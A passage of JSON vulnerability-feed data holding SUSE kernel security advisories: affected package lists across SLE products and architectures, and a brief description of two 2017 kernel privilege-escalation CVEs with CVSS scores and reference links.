"ocfs2-kmp-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-4_4_49-92_14-default-1", "packageFilename": "kgraft-patch-4_4_49-92_14-default-1-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "gfs2-kmp-default", "packageFilename": "gfs2-kmp-default-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "cluster-network-kmp-default", "packageFilename": "cluster-network-kmp-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "gfs2-kmp-default-debuginfo", "packageFilename": "gfs2-kmp-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "ocfs2-kmp-default-debuginfo", "packageFilename": "ocfs2-kmp-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "OpenStack Cloud Magnum Orchestration", "OSVersion": "7", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "ocfs2-kmp-default-debuginfo", "packageFilename": "ocfs2-kmp-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-obs-build", "packageFilename": "kernel-obs-build-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "cluster-md-kmp-default", "packageFilename": "cluster-md-kmp-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "cluster-md-kmp-default-debuginfo", "packageFilename": "cluster-md-kmp-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-extra-debuginfo", "packageFilename": "kernel-default-extra-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "gfs2-kmp-default-debuginfo", "packageFilename": "gfs2-kmp-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "dlm-kmp-default", "packageFilename": "dlm-kmp-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "cluster-network-kmp-default", "packageFilename": "cluster-network-kmp-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "cluster-md-kmp-default-debuginfo", "packageFilename": "cluster-md-kmp-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "kernel-syms", "packageFilename": "kernel-syms-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "cluster-network-kmp-default-debuginfo", "packageFilename": "cluster-network-kmp-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "cluster-network-kmp-default-debuginfo", "packageFilename": "cluster-network-kmp-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "gfs2-kmp-default-debuginfo", "packageFilename": "gfs2-kmp-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "dlm-kmp-default-debuginfo", "packageFilename": "dlm-kmp-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "cluster-md-kmp-default", "packageFilename": "cluster-md-kmp-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "ocfs2-kmp-default", "packageFilename": "ocfs2-kmp-default-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default", "packageFilename": "kernel-default-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "dlm-kmp-default-debuginfo", "packageFilename": "dlm-kmp-default-debuginfo-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "cluster-network-kmp-default-debuginfo", "packageFilename": "cluster-network-kmp-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-extra-debuginfo", "packageFilename": "kernel-default-extra-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for Raspberry Pi", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-4.4.49-92.14.1.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "gfs2-kmp-default", "packageFilename": "gfs2-kmp-default-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-extra", "packageFilename": "kernel-default-extra-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "cluster-network-kmp-default", "packageFilename": "cluster-network-kmp-default-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "OpenStack Cloud Magnum Orchestration", "OSVersion": "7", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "ppc64le", "packageName": "gfs2-kmp-default", "packageFilename": "gfs2-kmp-default-4.4.49-92.14.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "aarch64", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-4.4.49-92.14.1.aarch64.rpm", "operator": "lt"}, {"OS": "OpenStack Cloud Magnum Orchestration", "OSVersion": "7", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "dlm-kmp-default-debuginfo", "packageFilename": "dlm-kmp-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "cluster-md-kmp-default-debuginfo", "packageFilename": "cluster-md-kmp-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-4.4.49-92.14.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "ocfs2-kmp-default-debuginfo", "packageFilename": "ocfs2-kmp-default-debuginfo-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12.2", "packageVersion": "4.4.49-92.14.1", "arch": "s390x", "packageName": "kernel-obs-build-debugsource", "packageFilename": "kernel-obs-build-debugsource-4.4.49-92.14.1.s390x.rpm", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 12 kernel was updated to fix the following\n security bugs:\n\n - CVE-2017-7184: The Linux kernel allowed local users to obtain root\n privileges or cause a denial of service (heap-based out-of-bounds\n access) via unspecified vectors, as demonstrated during a Pwn2Own\n competition at CanSecWest 2017 (bnc#1030573, bnc#1028372).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bnc#1027565).\n\n", "reporter": "Suse", "published": "2017-03-30T06:09:06", "type": "suse", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7184", "CVE-2017-2636"], "modified": "2017-03-30T06:09:06", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-03/msg00047.html", "id": "SUSE-SU-2017:0864-1", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-30T05:17:27", "references": ["https://bugzilla.suse.com/1027565", "https://bugzilla.suse.com/1030573", "https://bugzilla.suse.com/1028372"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-source", "packageFilename": "kernel-source-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2", "packageFilename": "kernel-ec2-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2-devel", "packageFilename": "kernel-ec2-devel-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default", "packageFilename": "kernel-default-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_69-default-1", "packageFilename": "kgraft-patch-3_12_61-52_69-default-1-2.3.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-debuginfo", "packageFilename": "kernel-default-debuginfo-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.1", "arch": "s390x", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.61-52.69.1.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2-extra-debuginfo", "packageFilename": "kernel-ec2-extra-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-ec2-debuginfo", "packageFilename": "kernel-ec2-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-base-debuginfo", "packageFilename": "kernel-default-base-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "ppc64le", "packageName": "kernel-default-base", "packageFilename": "kernel-default-base-3.12.61-52.69.2.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-macros", "packageFilename": "kernel-macros-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.61-52.69.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.1", "arch": "x86_64", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.61-52.69.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-devel", "packageFilename": "kernel-default-devel-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-base-debuginfo", "packageFilename": "kernel-xen-base-debuginfo-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_69-xen-1", "packageFilename": "kgraft-patch-3_12_61-52_69-xen-1-2.3.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "s390x", "packageName": "kernel-default-man", "packageFilename": "kernel-default-man-3.12.61-52.69.2.s390x.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-xen-debugsource", "packageFilename": "kernel-xen-debugsource-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "3.12.61-52.69.1", "arch": "ppc64le", "packageName": "kernel-syms", "packageFilename": "kernel-syms-3.12.61-52.69.1.ppc64le.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "noarch", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.12.61-52.69.2.noarch.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "3.12.61-52.69.2", "arch": "x86_64", "packageName": "kernel-default-debugsource", "packageFilename": "kernel-default-debugsource-3.12.61-52.69.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", 